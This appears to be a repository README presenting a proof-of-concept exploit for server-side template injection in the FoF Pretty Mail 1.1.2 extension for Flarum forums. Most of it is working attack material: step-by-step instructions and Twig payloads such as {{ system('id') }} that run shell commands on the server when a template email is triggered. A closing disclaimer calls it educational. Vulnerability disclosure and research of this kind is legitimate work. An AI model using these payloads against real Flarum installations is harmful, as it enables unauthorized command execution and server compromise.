Exploit for a critical Server-Side Template Injection (SSTI) vulnerability discovered in the FoF Pretty Mail extension (version 1.1.2) used by Flarum forums. The vulnerability stems from improper sanitization of template variables, allowing attackers with administrative privileges to execute arbitrary code on the server.
Usage:
- Obtain administrative access to a Flarum forum with the FoF Pretty Mail extension installed.
- Navigate to the extension settings and access the email template editor.
- Inject the following payloads into the template: {{ 7*7 }} (demonstrates basic template expression evaluation) {{ system('id') }} (executes a system command to display user information) {{ system('echo "Take The Rose"') }} (executes a custom command)
- Save the modified template and trigger an email event (e.g., user registration).
- Observe the execution results in the received email, confirming the successful exploitation.
POC:
Editing the E-mail Template
Payload:
{{ 7*7 }}
{{ system('id') }}
{{ system('echo "Take The Rose"') }}
Trigger reset password action ( or any other action) to receive e-mail
on the email received:
Disclaimer:
This repository is intended for educational and research purposes only. The exploit is provided to raise awareness about the vulnerability and promote security best practices among Flarum users and developers. Unauthorized use of this exploit against systems without explicit consent is illegal and unethical.